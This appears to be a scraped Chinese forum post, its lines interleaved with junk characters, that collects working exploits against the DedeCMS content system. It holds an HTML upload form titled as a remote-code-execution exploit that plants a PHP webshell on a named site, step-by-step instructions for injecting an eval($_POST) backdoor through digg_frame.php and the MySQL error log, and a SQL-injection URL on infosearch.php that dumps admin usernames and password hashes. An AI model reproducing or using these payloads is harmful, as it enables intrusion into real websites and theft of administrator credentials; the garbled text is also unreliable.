2 ^( c, S$ m1 B- y' a* V2 t1 @<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>+ Z+ X, }3 A" @2 V
</head>: a) @# M- h N$ S- a
<body style="FONT-SIZE: 9pt">
/ c" n. r1 m& U4 C4 ^) ~0 G* |/ s6 B---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /># k$ ~" `+ k$ I' S8 Q1 k6 }
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>8 i% P1 w( b# P( T
<input type='hidden' name='activepath' value='/data/cache/' />+ L% O7 J, V+ l# q* Z9 F
<input type='hidden' name='cfg_basedir' value='../../' />
" C; {; \1 c* b* r2 o7 z4 s' O<input type='hidden' name='cfg_imgtype' value='php' />
! a X( n& k }4 P( h/ H* L2 I& J<input type='hidden' name='cfg_not_allowall' value='txt' /> c$ _' Y0 B8 Z, j2 `- I
<input type='hidden' name='cfg_softtype' value='php' />
6 O0 Z0 @" R: U: ^! J<input type='hidden' name='cfg_mediatype' value='php' /> e; b0 s( ~+ {2 C) h
<input type='hidden' name='f' value='form1.enclosure' />0 _- q5 |* T; x/ i
<input type='hidden' name='job' value='upload' />! g6 D+ J! B9 F! ?9 I0 W& L' R$ Y" B
<input type='hidden' name='newname' value='fly.php' />- |: C- i# R; e/ E
Select U Shell <input type='file' name='uploadfile' size='25' />4 a& |8 W8 t1 t0 ~8 \. v' ]
<input type='submit' name='sb1' value='确定' />. r- E: f, O: M+ Y- u+ s6 ~0 Z& X, m
</form>; j& [) l# V0 \8 o- I( z; w9 X% L
<br />It's just a exp for the bug of Dedecms V55...<br />
& ?' G- u3 }( M2 O% F4 ~Need register_globals = on...<br />
B0 q6 D0 L9 `# P; U7 ]/ G5 NFun the game,get a webshell at /data/cache/fly.php...<br />7 h3 a6 m3 [; a
</body>0 N$ i6 D$ x) ?: t& p
</html>6 e+ Q( p( O2 H& W0 O- A" v
' {. A' [# j% Y6 E- A
/ j/ b! z; F. c' U, H
2 T% e' \4 f2 S! I5 P- H5 q8 C# r5 P7 h6 \5 m
S; M% N: g. E# |% b) X0 h2 Q0 k; \& |* R
! i. p t& S9 q# L2 _
+ q! F) R m! H) y% E5 J" I
8 I6 c( v( e$ {) C [* m
' Q% g s& @+ J" q$ P. o
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞& W/ ^. i' ]# m( ?$ F- ^& [# [
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
! P' o# f% [! H1. 访问网址:& G$ n0 q* p+ z- d
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
( O# S# V0 R5 W可看见错误信息( k( d7 N9 Q# H/ c- D! ~
2 R' `, G, O# |# x/ `
' N$ h( u) v+ U' Z
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。' x$ c8 U' Z/ k2 k5 R3 J* [" M( Z1 v
int(3) Error: Illegal double '1024e1024' value found during parsing- C. f0 w; ?7 I$ P8 r9 g3 E- }
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3 O' r! c5 g% X4 e
* j- Q# n' F7 P/ C. T2 L, Y$ Z4 P. B
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
7 F9 f7 j! ]/ [3 @- v8 p7 ]& Z. W3 W; A
; `0 M. |5 W) Q0 ], D! U
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
+ P9 x9 Y% E' ^
2 h( s) v! r. v- V. U1 r; g- ~& {4 F. U1 M
按确定后的看到第2步骤的信息表示文件木马上传成功.
% z. ~6 d5 u, M
9 d, J. @8 ?2 |: n G" h. e) g" j9 B5 h
% V6 t* o" Q) R. _
% U, _8 p, v/ @' \* X, G2 N5 ~
# x# K; e! }! f% ]
3 q# X5 w" r2 E# e) S
6 I! h2 F/ B+ _: L: q3 G! j
% R: H; E& W$ A {% A( b9 a3 c$ b- [& ], f! p/ l) U2 q; }
* s) X0 G* E& M0 W
/ h- A+ v* K& |7 g; c
, X; z" A( ?+ ]! t, E织梦(DedeCms)plus/infosearch.php 文件注入漏洞$ B7 }# u" H2 W% K# V5 b
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对